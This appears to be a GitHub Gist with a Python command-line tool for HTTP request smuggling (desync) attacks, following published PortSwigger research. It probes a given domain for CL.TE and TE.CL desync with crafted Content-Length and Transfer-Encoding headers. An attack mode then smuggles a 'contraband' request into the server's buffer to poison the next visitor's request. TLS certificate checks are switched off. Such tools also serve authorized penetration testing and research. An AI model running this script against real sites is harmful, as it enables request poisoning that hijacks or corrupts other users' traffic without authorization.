Last active
August 14, 2019 20:15
-
-
Save sudoaza/afedf0483e208df8d57b01598012dfff to your computer and use it in GitHub Desktop.
HTTP Smuggler based on https://portswigger.net/blog/http-desync-attacks-request-smuggling-reborn
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import socket | |
import sys | |
import ssl | |
import argparse | |
from pwn import enhex | |
import time | |
def error(msg): | |
if not args.debug: | |
return | |
print(msg, sys.stderr) | |
def clte_detect(host, port=80, chunked_header="Transfer-Encoding: chunked"): | |
print("\nRunning CLTE Detection\n======================\n") | |
message = build_request(host, chunked_header, mode="izq") | |
response = request(host, port, message) | |
rejected = ("400 Bad Request" in response or "SMG_TIMEOUT" in response) | |
return not rejected | |
def tecl_detect(host, port=80, chunked_header="Transfer-Encoding: chunked"): | |
print("\nRunning TECL Detection\n======================\n\n") | |
message = build_request(host, chunked_header, mode="oxo") | |
response = request(host, port, message) | |
timed_out = ("SMG_TIMEOUT" in response) | |
return timed_out | |
def build_request(host, chunked_header, main_body="", smuggled_body="", mode="izq"): | |
content_len = 0 | |
chunk_len = 0 | |
if mode == "clte": | |
if len(main_body) > 0: | |
chunk_len = hex(len(main_body)).replace('0x','') | |
main_body = f"{chunk_len}\r\n{main_body}" | |
main_body += "\r\n0\r\n\r\n" | |
content_len = len(main_body + smuggled_body) -2 | |
elif mode == "tecl": | |
chunk_len = hex(len(smuggled_body)).replace('0x','') | |
if len(smuggled_body) > 0: | |
smuggled_body = smuggled_body + "\r\n0\r\n\r\n" | |
content_len = len(chunk_len) + 2 | |
main_body = chunk_len + "\r\n" | |
elif mode == "izq": | |
content_len = 4 | |
main_body = "1\r\nZ\r\nQ\r\n" | |
elif mode == "oxo": | |
content_len = 6 | |
main_body = "0\r\n\r\nX\r\n" | |
message = f"{args.http_method} {args.file} HTTP/1.1\r\n" + f"Host: {host}\r\nAccept: */*\r\n" | |
if len(chunked_header) > 0: | |
message += f"{chunked_header}\r\n" | |
message += f"Content-Length: {content_len}\r\n" | |
message += "\r\n" | |
message += main_body + smuggled_body | |
return message | |
def request(host, port, message): | |
print("# REQUEST >\n" + message + "\n") | |
start = time.time() | |
# Create a TCP/IP socket | |
sock = socket.socket(socket.AF_INET) | |
# Connect the socket to the port where the server is listening | |
server_address = (host, port) | |
if port == 443: | |
context = ssl.create_default_context() | |
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) | |
context.verify_mode = ssl.CERT_NONE | |
context.check_hostname = False | |
conn = context.wrap_socket(sock, server_hostname=host) | |
sock = conn | |
sock.connect(server_address) | |
sock.settimeout(3.0) | |
response = b"" | |
try: | |
error(f'sending "%s"' % message) | |
sock.sendall(str.encode(message)) | |
while True: | |
data = sock.recv(1024) | |
response += data | |
if len(data) == 0 or b"0\r\n\r\n" in response: | |
break | |
error('received "%s"' % data) | |
response = response.decode("utf-8") | |
if len(response) > 4000 and args.full: | |
print("< RESPONSE #\n" + f"length: {len(response)}\n" + response[:4000] + "\n\n...\n\n" + response[-1000:]+ "\n") | |
else: | |
print("< RESPONSE #\n" + f"length: {len(response)}\n" + response + "\n") | |
return response | |
except socket.timeout: # fail after 1 second of no activity | |
response = response.decode("utf-8") | |
response = "SMG_TIMEOUT\r\n" + response | |
print("< RESPONSE #\n" + response + "\n") | |
return response | |
finally: | |
error('closing socket') | |
sock.close() | |
def recon(chunked_header): | |
if clte_detect(target_host, target_port, chunked_header): | |
print("CLTE Detected") | |
elif tecl_detect(target_host, target_port, chunked_header): | |
print("TECL Detected") | |
else: | |
print("Not Vulnerable") | |
def attack(chunked_header, contraband, mode): | |
print("\nAttacking\n======================\n\n") | |
host, port = target_host, target_port | |
main_body = body | |
smuggled_body = contraband | |
message = build_request(host, chunked_header, main_body, smuggled_body, mode) | |
response = request(host, port, message) | |
parser = argparse.ArgumentParser() | |
parser.add_argument('-d','--domain', help='Domain', required=True) | |
parser.add_argument('-p','--port', help='Port', required=False, default=80) | |
parser.add_argument('-D','--debug', help='Debug', required=False, default=False) | |
parser.add_argument('--full', help='Show full answer', required=False, action="store_false") | |
parser.add_argument('-r','--recon', help='Check if server is vulnerable', required=False, action='store_true', default=True) | |
parser.add_argument('-a','--attack', help='Poison buffer', required=False, action='store_true') | |
parser.add_argument('-e','--transfer-encoding', help='Transfer Encoding header', required=False, default="Transfer-Encoding: chunked") | |
parser.add_argument('-c','--contraband', help='Payload to prepend to next request', required=False, default="GET /404 HTTP/1.1\r\nFoo: b") | |
parser.add_argument('-m','--mode', help='clte or tecl. Content Length in front Treansfer Encoding in back (clte).', required=False, default="clte") | |
parser.add_argument('-b','--body', help='Request body', required=False, default="=x&q=smuggling&x=") | |
parser.add_argument('-x','--http-method', help='Request method', required=False, default="POST") | |
parser.add_argument('-f','--file', help='Request path', required=False, default="/") | |
args = parser.parse_args() | |
target_host = args.domain | |
target_port = int(args.port) | |
chunked_header = args.transfer_encoding.replace("\\n","\n").replace("\\r","\r").replace("\\t","\t") | |
contraband = args.contraband.replace("\\r\\n","\r\n") | |
mode = args.mode | |
body = args.body | |
if args.attack: | |
attack(chunked_header, contraband, mode) | |
# Check attack worked, we should get the poisoned response | |
attack("", "", mode) | |
elif args.recon: | |
recon(chunked_header) | |
else: | |
print("Set either the -r/--recon or -a/--attack flag.") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment